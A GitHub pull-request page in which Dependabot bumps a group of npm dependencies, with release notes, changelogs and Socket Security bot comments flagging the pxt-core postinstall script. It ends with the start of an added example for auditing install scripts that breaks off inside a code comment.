@dependabot dependabot bot commented on behalf of github Apr 10, 2024

Bumps the npm_and_yarn group with 7 updates in the / directory:

| Package | From | To |
| --- | --- | --- |
| ajv | 4.11.8 | 6.12.6 |
| request | 2.83.0 | 2.88.2 |
| less | 2.7.3 | 4.2.0 |
| postcss | 5.2.18 | 8.4.38 |
| pxt-core | 0.18.6 | 8.3.1 |
| rtlcss | 2.2.0 | 4.1.1 |
| autoprefixer | 6.7.7 | 10.4.19 |

Updates ajv from 4.11.8 to 6.12.6

Release notes

Sourced from ajv's releases.

v6.12.6

Fix performance issue of "url" format.

v6.12.5

Fix uri scheme validation (@​ChALkeR). Fix boolean schemas with strictKeywords option (#1270)

v6.12.4

Fix: coercion of one-item arrays to scalar that should fail validation (failing example).

v6.12.3

Pass schema object to processCode function Option for strictNumbers (@​issacgerges, #1128) Fixed vulnerability related to untrusted schemas (CVE-2020-15366)

v6.12.2

Removed post-install script

v6.12.1

Docs and dependency updates

v6.12.0

Improved hostname validation (@​sambauers, #1143) Option keywords to add custom keywords (@​franciscomorais, #1137) Types fixes (@​boenrobot, @​MattiAstedrone) Docs:

v6.11.0

Time formats support two digit and colon-less variants of timezone offset (#1061 , @​cjpillsbury) Docs: RegExp related security considerations Tests: Disabled failing typescript test

v6.10.2

Fix: the unknown keywords were ignored with the option strictKeywords: true (instead of failing compilation) in some sub-schemas (e.g. anyOf), when the sub-schema didn't have known keywords.

v6.10.1

Fix types Fix addSchema (#1001) Update dependencies

v6.10.0

Option strictDefaults to report ignored defaults (#957, @​not-an-aardvark) Option strictKeywords to report unknown keywords (#781)

v6.9.0

OpenAPI keyword nullable can be any boolean (and not only true). Custom keyword definition changes:

  • dependencies option in to require the presence of keywords in the same schema.

... (truncated)

Commits
  • fe59143 6.12.6
  • d580d3e Merge pull request #1298 from ajv-validator/fix-url
  • fd36389 fix: regular expression for "url" format
  • 490e34c docs: link to v7-beta branch
  • 9cd93a1 docs: note about v7 in readme
  • 877d286 Merge pull request #1262 from b4h0-c4t/refactor-opt-object-type
  • f1c8e45 6.12.5
  • 764035e Merge branch 'ChALkeR-chalker/fix-comma'
  • 3798160 Merge branch 'chalker/fix-comma' of git://github.com/ChALkeR/ajv into ChALkeR...
  • a3c7eba Merge branch 'refactor-opt-object-type' of github.com:b4h0-c4t/ajv into refac...
  • Additional commits viewable in compare view

Updates request from 2.83.0 to 2.88.2

Changelog

Sourced from request's changelog.

Change Log

v2.88.0 (2018/08/10)

v2.87.0 (2018/05/21)

v2.86.0 (2018/05/15)

v2.85.0 (2018/03/12)

v2.84.0 (2018/03/12)

Commits

Updates less from 2.7.3 to 4.2.0

Release notes

Sourced from less's releases.

v4.2.0

v4.1.3

v4.1.2

v4.1.1

v4.1.0

Mixin parentheses requirement removed

This was maybe too big a change without some kind of deprecation or conversion. So for this version, this works again:

.mixin;

v4.0.0

This release has 2 breaking changes:

Parentheses required for mixin calls

This aligns it with syntax for calling detached rulesets.

Example

.mixin() {}
.mixin;  // error in 4.0

... (truncated)

Changelog

Sourced from less's changelog.

v4.2.0 (2023-08-06)

v4.1.3 (2022-06-09)

v4.1.2 (2021-10-04)

v4.1.1 (2021-01-31)

v4.1.0 (2021-01-10)

v4.0.0 (2020-12-18)

v3.13.1 (2020-12-18)

v3.13.0 (2020-12-12)

v3.12.2 (2020-07-16)

v3.12.1 (2020-07-16)

v3.12.0 (2020-07-13)

... (truncated)

Commits

Updates postcss from 5.2.18 to 8.4.38

Release notes

Sourced from postcss's releases.

8.4.38

8.4.37

  • Fixed original.column are not numbers error in another case.

8.4.36

  • Fixed original.column are not numbers error on broken previous source map.

8.4.35

  • Avoid ! in node.parent.nodes type.
  • Allow to pass undefined to node adding method to simplify types.

8.4.34

8.4.33

8.4.32

8.4.31

8.4.30

8.4.29

8.4.28

  • Fixed Root.source.end for better source map (by @​romainmenke).
  • Fixed Result.root types when process() has no parser.

8.4.27

  • Fixed Container clone methods types.

8.4.26

  • Fixed clone methods types.

8.4.25

8.4.24

  • Fixed Plugin types.

... (truncated)

Changelog

Sourced from postcss's changelog.

8.4.38

8.4.37

  • Fixed original.column are not numbers error in another case.

8.4.36

  • Fixed original.column are not numbers error on broken previous source map.

8.4.35

  • Avoid ! in node.parent.nodes type.
  • Allow to pass undefined to node adding method to simplify types.

8.4.34

  • Fixed AtRule#nodes type (by Tim Weißenfels).
  • Cleaned up code (by Dmitry Kirillov).

8.4.33

  • Fixed NoWorkResult behavior difference with normal mode (by Romain Menke).
  • Fixed NoWorkResult usage conditions (by @​ahmdammarr).

8.4.32

  • Fixed postcss().process() types (by Andrew Ferreira).

8.4.31

8.4.30

  • Improved source map performance (by Romain Menke).

8.4.29

  • Fixed Node#source.offset (by Ido Rosenthal).
  • Fixed docs (by Christian Oliff).

8.4.28

  • Fixed Root.source.end for better source map (by Romain Menke).
  • Fixed Result.root types when process() has no parser.

8.4.27

  • Fixed Container clone methods types.

8.4.26

  • Fixed clone methods types.

8.4.25

8.4.24

  • Fixed Plugin types.

... (truncated)

Commits

Updates pxt-core from 0.18.6 to 8.3.1

Commits

Updates rtlcss from 2.2.0 to 4.1.1

Release notes

Sourced from rtlcss's releases.

Version 4.0

  • Update dependencies, Internal code refactoring, cleanup and optimizations. Thanks @​XhmikosR
  • Support flipping justify-content, justify-items and justify-self. Thanks @​mbehzad
  • Support flipping length position without using calc.

Version 3.0

  • Upgrade to POSTCSS 8.
  • Dropped Node.js 6.x, 8.x, 11.x, and 13.x versions.
Changelog

Sourced from rtlcss's changelog.

4.1.1 - 18 Sep. 2023

  • Update mirroring transform to safeguard functions inside values.
  • Internal code refactoring. Thanks @​XhmikosR

4.1.0 - 11 Apr. 2023

  • Update dependencies. Thanks @​XhmikosR
  • Update mirroring transform-origin to not flip y-offset when x-offset is center. Thanks @​skmanohar
  • Return an error code when the parsed CSS file is invalid. Thanks @​HANNICHE-Walid

4.0.0 - 09 Aug. 2022

  • Update dependencies, Internal code refactoring, cleanup and optimizations. Thanks @​XhmikosR
  • Support flipping justify-content, justify-items and justify-self. Thanks @​mbehzad
  • Support flipping length position without using calc.

3.5.0 - 02 Nov. 2021

3.4.0 - 18 Oct. 2021

  • Support flipping object-position.
  • Update devDependencies.

3.3.0 - 08 Jul. 2021

  • Add processEnv option to support flipping agent-defined environment variables (safe-area-inset-left, safe-area-inset-right).

3.2.1 - 22 Jun. 2021

3.2.0 - 23 May. 2021

  • Add aliases option to support processing Custom Properties (CSS Variables). Thanks @​elchininet

3.1.2 - 04 Feb. 2021

  • Update README.md.

3.1.1 - 02 Feb. 2021

  • Fixes TypeError when placing value directive before !important. #218

3.1.0 - 30 Jan. 2021

... (truncated)

Commits

Updates autoprefixer from 6.7.7 to 10.4.19

Release notes

Sourced from autoprefixer's releases.

10.4.19

  • Removed end value has mixed support, consider using flex-end warning since end/start now have good support.

10.4.18

  • Fixed removing -webkit-box-orient on -webkit-line-clamp (@​Goodwine).

10.4.17

  • Fixed user-select: contain prefixes.

10.4.16

10.4.15

10.4.14

  • Improved startup time and reduced JS bundle size (by @​Knagis).

10.4.13

  • Fixed missed prefixes on vendor prefixes in name of CSS Custom Property.

10.4.12

  • Fixed support of unit-less zero angle in backgrounds (by @​yisibl).

10.4.11

  • Fixed text-decoration prefixes by moving to MDN data (by @​romainmenke).

10.4.10

  • Fixed unicode-bidi prefixes by moving to MDN data.

10.4.9

  • Fixed css-unicode-bidi issue from latest Can I Use.

10.4.8

  • Do not print color-adjust warning if print-color-adjust also is in rule.

10.4.7

  • Fixed print-color-adjust support in Firefox.

10.4.6

  • Fixed print-color-adjust support.

10.4.5

10.4.4

  • Fixed package.funding to have same value between all PostCSS packages.

... (truncated)

Changelog

Sourced from autoprefixer's changelog.

10.4.19

  • Removed end value has mixed support, consider using flex-end warning since end/start now have good support.

10.4.18

  • Fixed removing -webkit-box-orient on -webkit-line-clamp (@​Goodwine).

10.4.17

  • Fixed user-select: contain prefixes.

10.4.16

  • Improved performance (by Romain Menke).
  • Fixed docs (by Christian Oliff).

10.4.15

  • Fixed ::backdrop prefixes (by 一丝).
  • Fixed docs (by Christian Oliff).

10.4.14

  • Improved startup time and reduced JS bundle size (by Kārlis Gaņģis).

10.4.13

  • Fixed missed prefixes on vendor prefixes in name of CSS Custom Property.

10.4.12

  • Fixed support of unit-less zero angle in backgrounds (by 一丝).

10.4.11

  • Fixed text-decoration prefixes by moving to MDN data (by Romain Menke).

10.4.10

  • Fixed unicode-bidi prefixes by moving to MDN data.

10.4.9

  • Fixed css-unicode-bidi issue from latest Can I Use.

10.4.8

  • Do not print color-adjust warning if print-color-adjust also is in rule.

10.4.7

  • Fixed print-color-adjust support in Firefox.

10.4.6

  • Fixed print-color-adjust support.

10.4.5

10.4.4

  • Fixed package.funding to have same value between all PostCSS packages.

... (truncated)

Commits

Updates jquery from 3.2.1 to 3.7.1

Release notes

Sourced from jquery's releases.

jQuery 3.7.1 Released: Reliable Table Row Dimensions

https://blog.jquery.com/2023/08/28/jquery-3-7-1-released-reliable-table-row-dimensions/

jQuery 3.7.0: Staying in Order

https://blog.jquery.com/2023/05/11/jquery-3-7-0-released-staying-in-order/

jQuery 3.6.4 Released: Selector Forgiveness

https://blog.jquery.com/2023/03/08/jquery-3-6-4-released-selector-forgiveness/

jQuery supports CSS.supports in jQuery 3.6.3

https://blog.jquery.com/2022/12/20/jquery-3-6-3-released-a-quick-selector-fix/

jQuery 3.6.2 :has arrived!

https://blog.jquery.com/2022/12/13/jquery-3-6-2-released/

jQuery 3.6.1 Maintenance Release

https://blog.jquery.com/2022/08/26/jquery-3-6-1-maintenance-release/

jQuery 3.6.0 Released!

https://blog.jquery.com/2021/03/02/jquery-3-6-0-released/

jQuery 3.5.0 Released!

See the blog post: https://blog.jquery.com/2020/04/10/jquery-3-5-0-released/ and the upgrade guide: https://jquery.com/upgrade-guide/3.5/

NOTE: Despite being a minor release, this update includes a breaking change that we had to make to fix a security issue (CVE-2020-11022). Please follow the blog post & the upgrade guide for more details.

Commits
  • f79d5f1 3.7.1
  • 399b201 Release: revert change that broke release
  • f85d521 Release: update authors
  • 763ade6 Build: Generate the slim build on grunt & run compare_size on it
  • a288838 CSS: Make the reliableTrDimensions support test work with Bootstrap CSS (3.x ...
  • 87467a6 Selector: Only attach the unload handler in IE & Edge Legacy
  • 3c18c1f Build: Make sure *.cjs & *.mjs files use UNIX line endings as well
  • 72ae577 Build: switch preferred email for timmywil
  • a370d7d Build: Build: Bump actions/checkout from 3.5.2 to 3.5.3
  • 4a29888 Docs: Fix typos found by codespell
  • Additional commits viewable in compare view

Updates marked from 0.3.12 to 0.3.19

Commits

Updates semver from 5.3.0 to 5.7.2

Release notes

Sourced from semver's releases.

v5.7.2

5.7.2 (2023-07-10)

Bug Fixes

Changelog

Sourced from semver's changelog.

5.7.2 (2023-07-10)

Bug Fixes

5.7

  • Add minVersion method

5.6

  • Move boolean loose param to an options object, with backwards-compatibility protection.
  • Add ability to opt out of special prerelease version handling with the includePrerelease option flag.

5.5

  • Add version coercion capabilities

5.4

  • Add intersection checking

5.3

  • Add minSatisfying method

5.2

  • Add prerelease(v) that returns prerelease components

5.1

  • Add Backus-Naur for ranges
  • Remove excessively cute inspection methods

5.0

  • Remove AMD/Browserified build artifacts
  • Fix ltr and gtr when using the * range
  • Fix for range * with a prerelease identifier
Commits
Maintainer changes

This version was pushed to npm by lukekarrys, a new releaser for semver since your current version.


Updates websocket-extensions from 0.1.3 to 0.1.4

Changelog

Sourced from websocket-extensions's changelog.

0.1.4 / 2020-06-02

  • Remove a ReDoS vulnerability in the header parser (CVE-2020-7662, reported by Robert McLaughlin)
  • Change license from MIT to Apache 2.0
Commits
  • 5ea0b42 Bump version to 0.1.4
  • 29496f6 Remove ReDoS vulnerability in the Sec-WebSocket-Extensions header parser
  • 4a76c75 Add Node versions 13 and 14 on Travis
  • 44a677a Formatting change: {...} should have spaces inside the braces
  • f6c50ab Let npm reformat package.json
  • 2d211f3 Change markdown formatting of docs.
  • 0b62083 Update Travis target versions.
  • 729a465 Switch license to Apache 2.0.
  • See full diff in compare view

Dependabot will resolve any conflicts with this PR as long as you don't alter it yourself. You can also trigger a rebase manually by commenting @dependabot rebase.


Dependabot commands and options

You can trigger Dependabot actions by commenting on this PR:

  • @dependabot rebase will rebase this PR
  • @dependabot recreate will recreate this PR, overwriting any edits that have been made to it
  • @dependabot merge will merge this PR after your CI passes on it
  • @dependabot squash and merge will squash and merge this PR after your CI passes on it
  • @dependabot cancel merge will cancel a previously requested merge and block automerging
  • @dependabot reopen will reopen this PR if it is closed
  • @dependabot close will close this PR and stop Dependabot recreating it. You can achieve the same result by closing it manually
  • @dependabot show <dependency name> ignore conditions will show all of the ignore conditions of the specified dependency
  • @dependabot ignore <dependency name> major version will close this group update PR and stop Dependabot creating any more for the specific dependency's major version (unless you unignore this specific dependency's major version or upgrade to it yourself)
  • @dependabot ignore <dependency name> minor version will close this group update PR and stop Dependabot creating any more for the specific dependency's minor version (unless you unignore this specific dependency's minor version or upgrade to it yourself)
  • @dependabot ignore <dependency name> will close this group update PR and stop Dependabot creating any more for the specific dependency (unless you unignore this specific dependency or upgrade to it yourself)
  • @dependabot unignore <dependency name> will remove all of the ignore conditions of the specified dependency
  • @dependabot unignore <dependency name> <ignore condition> will remove the ignore condition of the specified dependency and ignore conditions

You can disable automated security fix PRs for this repo from the Security Alerts page.

Bumps the npm_and_yarn group with 7 updates in the / directory:

| Package | From | To |
| --- | --- | --- |
| [ajv](https://github.com/ajv-validator/ajv) | `4.11.8` | `6.12.6` |
| [request](https://github.com/request/request) | `2.83.0` | `2.88.2` |
| [less](https://github.com/less/less.js) | `2.7.3` | `4.2.0` |
| [postcss](https://github.com/postcss/postcss) | `5.2.18` | `8.4.38` |
| [pxt-core](https://github.com/microsoft/pxt) | `0.18.6` | `8.3.1` |
| [rtlcss](https://github.com/MohammadYounes/rtlcss) | `2.2.0` | `4.1.1` |
| [autoprefixer](https://github.com/postcss/autoprefixer) | `6.7.7` | `10.4.19` |



Updates `ajv` from 4.11.8 to 6.12.6
- [Release notes](https://github.com/ajv-validator/ajv/releases)
- [Commits](ajv-validator/ajv@4.11.8...v6.12.6)

Updates `request` from 2.83.0 to 2.88.2
- [Changelog](https://github.com/request/request/blob/master/CHANGELOG.md)
- [Commits](https://github.com/request/request/commits)

Updates `less` from 2.7.3 to 4.2.0
- [Release notes](https://github.com/less/less.js/releases)
- [Changelog](https://github.com/less/less.js/blob/master/CHANGELOG.md)
- [Commits](less/less.js@v2.7.3...v4.2.0)

Updates `postcss` from 5.2.18 to 8.4.38
- [Release notes](https://github.com/postcss/postcss/releases)
- [Changelog](https://github.com/postcss/postcss/blob/main/CHANGELOG.md)
- [Commits](https://github.com/postcss/postcss/commits/8.4.38)

Updates `pxt-core` from 0.18.6 to 8.3.1
- [Changelog](https://github.com/microsoft/pxt/blob/master/common-docs/release-tests.md)
- [Commits](microsoft/pxt@v0.18.6...v8.3.1)

Updates `rtlcss` from 2.2.0 to 4.1.1
- [Release notes](https://github.com/MohammadYounes/rtlcss/releases)
- [Changelog](https://github.com/MohammadYounes/rtlcss/blob/master/CHANGELOG.md)
- [Commits](MohammadYounes/rtlcss@2.2.0...v4.1.1)

Updates `autoprefixer` from 6.7.7 to 10.4.19
- [Release notes](https://github.com/postcss/autoprefixer/releases)
- [Changelog](https://github.com/postcss/autoprefixer/blob/main/CHANGELOG.md)
- [Commits](postcss/autoprefixer@6.7.7...10.4.19)

Updates `jquery` from 3.2.1 to 3.7.1
- [Release notes](https://github.com/jquery/jquery/releases)
- [Commits](jquery/jquery@3.2.1...3.7.1)

Updates `marked` from 0.3.12 to 0.3.19
- [Release notes](https://github.com/markedjs/marked/releases)
- [Changelog](https://github.com/markedjs/marked/blob/master/.releaserc.json)
- [Commits](markedjs/marked@v0.3.12...v0.3.19)

Updates `semver` from 5.3.0 to 5.7.2
- [Release notes](https://github.com/npm/node-semver/releases)
- [Changelog](https://github.com/npm/node-semver/blob/v5.7.2/CHANGELOG.md)
- [Commits](npm/node-semver@v5.3.0...v5.7.2)

Updates `websocket-extensions` from 0.1.3 to 0.1.4
- [Changelog](https://github.com/faye/websocket-extensions-node/blob/main/CHANGELOG.md)
- [Commits](faye/websocket-extensions-node@0.1.3...0.1.4)

---
updated-dependencies:
- dependency-name: ajv
  dependency-type: indirect
  dependency-group: npm_and_yarn
- dependency-name: request
  dependency-type: indirect
  dependency-group: npm_and_yarn
- dependency-name: less
  dependency-type: direct:development
  dependency-group: npm_and_yarn
- dependency-name: postcss
  dependency-type: indirect
  dependency-group: npm_and_yarn
- dependency-name: pxt-core
  dependency-type: direct:production
  dependency-group: npm_and_yarn
- dependency-name: rtlcss
  dependency-type: direct:development
  dependency-group: npm_and_yarn
- dependency-name: autoprefixer
  dependency-type: direct:development
  dependency-group: npm_and_yarn
- dependency-name: jquery
  dependency-type: indirect
  dependency-group: npm_and_yarn
- dependency-name: marked
  dependency-type: indirect
  dependency-group: npm_and_yarn
- dependency-name: semver
  dependency-type: indirect
  dependency-group: npm_and_yarn
- dependency-name: websocket-extensions
  dependency-type: indirect
  dependency-group: npm_and_yarn
...

Signed-off-by: dependabot[bot] <support@github.com>
@dependabot dependabot bot added the dependencies Pull requests that update a dependency file label Apr 10, 2024
@socket-security

New and removed dependencies detected. Learn more about Socket for GitHub ↗︎

| Package | New capabilities | Transitives | Size | Publisher |
| --- | --- | --- | --- | --- |
| npm/autoprefixer@10.4.19 | environment | 0 | 199 kB | ai |
| npm/browserslist@4.23.0 | environment, filesystem | 0 | 62.8 kB | ai |
| npm/caniuse-lite@1.0.30001607 | None | 0 | 2.04 MB | caniuse-lite |
| npm/codem-isoboxer@0.3.6 | None | 0 | 117 kB | tieleman |
| npm/copy-anything@2.0.6 | None | 0 | 11.9 kB | mesqueeb |
| npm/dashjs@4.4.0 | None | 0 | 36.6 MB | dsilhavy |
| npm/errno@0.1.8 | None | 0 | 18.1 kB | ralphtheninja |
| npm/es6-promise@4.2.8 | None | 0 | 315 kB | stefanpenner |
| npm/escalade@3.1.2 | filesystem | 0 | 11.6 kB | lukeed |
| npm/fast-deep-equal@2.0.1 | None | 0 | 5.42 kB | esp |
| npm/fraction.js@4.3.7 | None | 0 | 86.2 kB | infusion |
| npm/graceful-fs@4.2.11 | environment, filesystem | 0 | 32.5 kB | isaacs |
| npm/html-entities@1.4.0 | None | 0 | 68.6 kB | mdevils |
| npm/http-parser-js@0.5.8 | None | 0 | 25.8 kB | jimbly |
| npm/iconv-lite@0.6.3 | None | 0 | 349 kB | ashtuchkin |
| npm/imsc@1.1.5 | None | +1 | 1.09 MB | palemieux |
| npm/is-what@3.14.1 | None | 0 | 62.3 kB | mesqueeb |
| npm/jquery@3.7.1 | None | 0 | 1.25 MB | timmywil |
| npm/less@4.2.0 | eval, filesystem | +1 | 3.64 MB | matthew-dean |
| npm/lie@3.1.1 | None | 0 | 44.9 kB | cwmma |
| npm/localforage@1.10.0 | network | 0 | 468 kB | tofumatt |
| npm/make-dir@2.1.0 | filesystem | +1 | 72.5 kB | sindresorhus |
| npm/marked@0.3.19 | None | 0 | 80.6 kB | amidknight |
| npm/mime@1.6.0 | environment, filesystem | 0 | 51.7 kB | broofa |
| npm/nanoid@3.3.7 | None | 0 | 24.4 kB | ai |
| npm/needle@3.3.1 | environment, filesystem, network | 0 | 324 kB | tomas |
| npm/node-releases@2.0.14 | None | 0 | 34 kB | chicoxyzzy |
| npm/parse-node-version@1.0.1 | None | 0 | 4.5 kB | phated |
| npm/picocolors@1.0.0 | environment | 0 | 5.66 kB | alexeyraspopov |
| npm/pify@4.0.1 | None | 0 | 7.23 kB | sindresorhus |
| npm/postcss-value-parser@4.2.0 | None | 0 | 27.2 kB | evilebottnawi |
| npm/postcss@8.4.38 | environment, filesystem | 0 | 198 kB | ai |
| npm/prr@1.0.1 | None | 0 | 10.1 kB | rvagg |
| npm/pxt-core@8.3.1 | environment, filesystem, network, shell | 0 | 59 MB | kindscript |
| npm/rtlcss@4.1.1 | eval | 0 | 51.8 kB | myounes |
| npm/safe-buffer@5.2.1 | None | 0 | 32.1 kB | feross |
| npm/safer-buffer@2.1.2 | None | 0 | 42.3 kB | chalker |
| npm/semantic-ui-less@2.2.14 | None | 0 | 3.82 MB | semantic-bot |
| npm/source-map-js@1.2.0 | None | 0 | 140 kB | 7rulnik |
| npm/strip-json-comments@3.1.1 | None | 0 | 6.96 kB | sindresorhus |
| npm/tslib@2.6.2 | None | 0 | 84 kB | typescript-bot |
| npm/update-browserslist-db@1.0.13 | filesystem, shell | 0 | 13.9 kB | ai |
| npm/websocket-driver@0.7.4 | network | 0 | 67.4 kB | jcoglan |
| npm/websocket-extensions@0.1.4 | None | 0 | 55 kB | jcoglan |

🚮 Removed packages: npm/ajv@5.5.2, npm/alphanum-sort@1.0.2, npm/ansi-regex@2.1.1, npm/ansi-styles@2.2.1, npm/aproba@1.2.0, npm/are-we-there-yet@1.1.4, npm/argparse@1.0.9, npm/asap@2.0.6, npm/asn1@0.2.3, npm/assert-plus@1.0.0, npm/asynckit@0.4.0, npm/autoprefixer@6.7.7, npm/aws-sign2@0.7.0, npm/aws4@1.6.0, npm/balanced-match@0.4.2, npm/bcrypt-pbkdf@1.0.1, npm/bindings@1.3.0, npm/bl@1.2.1, npm/bluebird@3.5.1, npm/boom@4.3.1, npm/brace-expansion@1.1.8, npm/browserslist@1.7.7, npm/caniuse-api@1.6.1, npm/caniuse-db@1.0.30000751, npm/caseless@0.12.0, npm/chalk@1.1.3, npm/chownr@1.0.1, npm/clap@1.2.3, npm/clone@1.0.3, npm/co@4.6.0, npm/coa@1.0.4, npm/code-point-at@1.1.0, npm/color-convert@1.9.0, npm/color-name@1.1.3, npm/color-string@0.3.0, npm/color@0.11.4, npm/colormin@1.1.2, npm/colors@1.1.2, npm/combined-stream@1.0.5, npm/commander@2.1.0, npm/concat-map@0.0.1, npm/console-control-strings@1.1.0, npm/core-util-is@1.0.2, npm/cryptiles@3.1.2, npm/css-color-names@0.0.4, npm/cssnano@3.10.0, npm/csso@2.3.2, npm/dashdash@1.14.1, npm/debug@2.6.9, npm/decamelize@1.2.0, npm/deep-extend@0.4.2, npm/define-properties@1.1.2, npm/defined@1.0.0, npm/delayed-stream@1.0.0, npm/delegates@1.0.0, npm/detect-libc@1.0.3, npm/ecc-jsbn@0.1.1, npm/electron-to-chromium@1.3.27, npm/end-of-stream@1.4.1, npm/errno@0.1.4, npm/escape-string-regexp@1.0.5, npm/esprima@2.7.3, npm/expand-template@1.1.0, npm/extend@3.0.1, npm/extsprintf@1.3.0, npm/fast-deep-equal@1.0.0, npm/fast-json-stable-stringify@2.0.0, npm/findup@0.1.5, npm/flatten@1.0.2, npm/foreach@2.0.5, npm/forever-agent@0.6.1, npm/form-data@2.3.1, npm/fs.realpath@1.0.0, npm/function-bind@1.1.1, npm/fuse.js@2.6.1, npm/gauge@2.7.4, npm/getpass@0.1.7, npm/github-from-package@0.0.0, npm/glob@7.1.2, npm/graceful-fs@4.1.11, npm/har-schema@2.0.0, npm/har-validator@5.0.3, npm/has-ansi@2.0.0, npm/has-flag@1.0.0, npm/has-symbols@1.0.0, npm/has-unicode@2.0.1, npm/has@1.0.1, npm/hawk@6.0.2, npm/highlight.js@9.12.0, npm/hoek@4.2.0, 
npm/html-comment-regex@1.1.1, npm/http-parser-js@0.4.10, npm/http-signature@1.2.0, npm/indexes-of@1.0.1, npm/inflight@1.0.6, npm/inherits@2.0.3, npm/ini@1.3.5, npm/is-absolute-url@2.1.0, npm/is-fullwidth-code-point@1.0.0, npm/is-plain-obj@1.1.0, npm/is-svg@2.1.0, npm/is-typedarray@1.0.0, npm/isarray@1.0.0, npm/isstream@0.1.2, npm/jquery@3.2.1, npm/js-base64@2.3.2, npm/js-yaml@3.7.0, npm/jsbn@0.1.1, npm/json-schema-traverse@0.3.1, npm/json-schema@0.2.3, npm/json-stable-stringify@1.0.1, npm/json-stringify-safe@5.0.1, npm/jsonify@0.0.0, npm/jsprim@1.4.1, npm/keytar@3.0.2, npm/less@2.7.3, npm/lie@3.2.0, npm/lodash.memoize@4.1.2, npm/lodash.uniq@4.5.0, npm/lzma@2.3.2, npm/macaddress@0.2.8, npm/marked@0.3.12, npm/math-expression-evaluator@1.2.17, npm/mime-db@1.30.0, npm/mime-types@2.1.17, npm/mime@1.4.1, npm/minimatch@3.0.4, npm/minimist@0.0.8, npm/mkdirp@0.5.1, npm/ms@2.0.0, npm/nan@2.3.2, npm/node-abi@2.2.0, npm/node-hid@0.5.7, npm/noop-logger@0.1.1, npm/normalize-url@1.9.1, npm/npmlog@4.1.2, npm/num2fraction@1.2.2, npm/number-is-nan@1.0.1, npm/oauth-sign@0.8.2, npm/object-assign@4.1.1, npm/object-keys@1.0.11, npm/object.assign@4.1.0, npm/once@1.4.0, npm/os-homedir@1.0.2, npm/path-is-absolute@1.0.1, npm/performance-now@2.1.0, npm/postcss-calc@5.3.1, npm/postcss-colormin@2.2.2, npm/postcss-convert-values@2.6.1, npm/postcss-discard-comments@2.0.4, npm/postcss-discard-duplicates@2.1.0, npm/postcss-discard-empty@2.1.0, npm/postcss-discard-overridden@0.1.1, npm/postcss-discard-unused@2.2.3, npm/postcss-filter-plugins@2.0.2, npm/postcss-merge-idents@2.1.7, npm/postcss-merge-longhand@2.0.2, npm/postcss-merge-rules@2.1.2, npm/postcss-message-helpers@2.0.0, npm/postcss-minify-font-values@1.0.5, npm/postcss-minify-gradients@1.0.5, npm/postcss-minify-params@1.2.2, npm/postcss-minify-selectors@2.1.1, npm/postcss-normalize-charset@1.1.1, npm/postcss-normalize-url@3.0.8, npm/postcss-ordered-values@2.2.3, npm/postcss-reduce-idents@2.4.0, npm/postcss-reduce-initial@1.0.1, 
npm/postcss-reduce-transforms@1.0.4, npm/postcss-selector-parser@2.2.3, npm/postcss-svgo@2.1.6, npm/postcss-unique-selectors@2.0.2, npm/postcss-value-parser@3.3.0, npm/postcss-zindex@2.2.0, npm/postcss@6.0.13, npm/prebuild-install@2.5.0, npm/prepend-http@1.0.4, npm/process-nextick-args@1.0.7, npm/promise@7.3.1, npm/prr@0.0.0, npm/pump@1.0.3, npm/punycode@1.4.1, npm/pxt-core@0.16.1, npm/q@1.5.1, npm/qs@6.5.1, npm/query-string@4.3.4, npm/rc@1.2.5, npm/readable-stream@2.3.3, npm/reduce-css-calc@1.3.0, npm/reduce-function-call@1.0.2, npm/request@2.83.0, npm/rimraf@2.5.4, npm/rtlcss@2.2.0, npm/safe-buffer@5.1.1, npm/semantic-ui-less@2.2.12, npm/semver@5.5.0, npm/serialport@4.0.7, npm/set-blocking@2.0.0, npm/signal-exit@3.0.2, npm/simple-get@1.4.3, npm/sntp@2.1.0, npm/sort-keys@1.1.2, npm/source-map@0.5.7, npm/sprintf-js@1.0.3, npm/sshpk@1.13.1, npm/strict-uri-encode@1.1.0, npm/string-width@1.0.2, npm/string_decoder@1.0.3, npm/stringstream@0.0.5, npm/strip-ansi@3.0.1, npm/strip-json-comments@2.0.1, npm/supports-color@3.2.3, npm/svgo@0.7.2, npm/tar-fs@1.16.0, npm/tar-stream@1.5.5, npm/tough-cookie@2.3.3, npm/tunnel-agent@0.6.0, npm/tweetnacl@0.14.5, npm/uniq@1.0.1, npm/uniqid@4.1.1, npm/uniqs@2.0.0, npm/unzip-response@1.0.2, npm/util-deprecate@1.0.2, npm/uuid@3.1.0, npm/vendors@1.0.1, npm/verror@1.10.0, npm/websocket-driver@0.7.0, npm/websocket-extensions@0.1.3, npm/whet.extend@0.9.9, npm/wide-align@1.1.2, npm/wrappy@1.0.2, npm/xtend@4.0.1

View full report↗︎

@socket-security

🚨 Potential security issues detected. Learn more about Socket for GitHub ↗︎

To accept the risk, merge this PR and you will not be notified again.

| Alert | Package | Note | Source |
| --- | --- | --- | --- |
| Install scripts | npm/pxt-core@8.3.1 | Install script: `postinstall` | `cd webapp && npm install && cd .. && cd skillmap && npm install && cd .. && cd authcode && npm install && cd .. && cd multiplayer && npm install && cd ..` |

View full report↗︎

Next steps

What is an install script?

Install scripts are run when the package is installed. The majority of malware in npm is hidden in install scripts.

Packages should not be running non-essential scripts during install and there are often solutions to problems people solve with install scripts that can be run at publish time instead.

Take a deeper look at the dependency

Take a moment to review the security alert above. Review the linked package source code to understand the potential risk. Ensure the package is not malicious before proceeding. If you're unsure how to proceed, reach out to your security team or ask the Socket team for help at support [AT] socket [DOT] dev.

Remove the package

If you happen to install a dependency that Socket reports as Known Malware you should immediately remove it and select a different dependency. For other alert types, you may wish to investigate alternative packages or consider if there are other ways to mitigate the specific risk posed by the dependency.

Mark a package as acceptable risk

To ignore an alert, reply with a comment starting with @SocketSecurity ignore followed by a space separated list of ecosystem/package-name@version specifiers. e.g. @SocketSecurity ignore npm/foo@1.0.0 or ignore all packages with @SocketSecurity ignore-all

  • @SocketSecurity ignore npm/pxt-core@8.3.1
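An added example, not code from this PR, from Dependabot or from Socket, showing how to find install scripts like the `pxt-core` `postinstall` flagged above before deciding whether to merge. It reads two things that are already on disk: the `hasInstallScript` flag npm writes into `package-lock.json` (lockfileVersion 2 and 3), which works before anything is installed, and the `scripts` section of each installed `package.json` after an `npm ci --ignore-scripts`. The `tree` input shape (`"name@version"` to parsed package.json), the `classify` heuristics and the `example-dropper` package are assumptions made for this example; the only real command in the sample data is the pxt-core `postinstall` quoted in the alert.

```javascript
// Added example (not the PR's, Dependabot's or Socket's code): locate npm
// install-time scripts in a dependency tree and triage their commands.

// npm runs these three hooks when a package is installed from the registry.
const INSTALL_HOOKS = ["preinstall", "install", "postinstall"];

// Check 1: package-lock.json (lockfileVersion 2/3) marks each package that
// declares an install-time script with "hasInstallScript": true, so the tree
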